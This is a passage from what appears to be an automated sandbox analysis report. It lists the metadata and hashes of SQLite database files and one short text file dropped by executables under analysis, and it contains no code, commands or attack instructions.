                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):25
                                                                                                                                                                  Entropy (8bit):4.373660689688184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:9FfWNKn:rfXn
                                                                                                                                                                  MD5:CD057CD9542B0E7296E48D008CF1549B
                                                                                                                                                                  SHA1:9A49817A8C53C410F21E20B00B6D054857C133EB
                                                                                                                                                                  SHA-256:E8EB84EC613CCD5F21256FDA23873D224868E9DB2B8A06C2AE7AEE207980BCD0
                                                                                                                                                                  SHA-512:AFA797BA21C2117941D9F40D778288BFC157D9B3872987027B7DAC5877BB5C7B8E2D7B7BFEBA774EE6C8C4AA775AA5AB11C8F9CE752C6DBC7839863E1DE3E9DB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:4NJy1Z6nzdV3xbGKjoRbfseKK
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
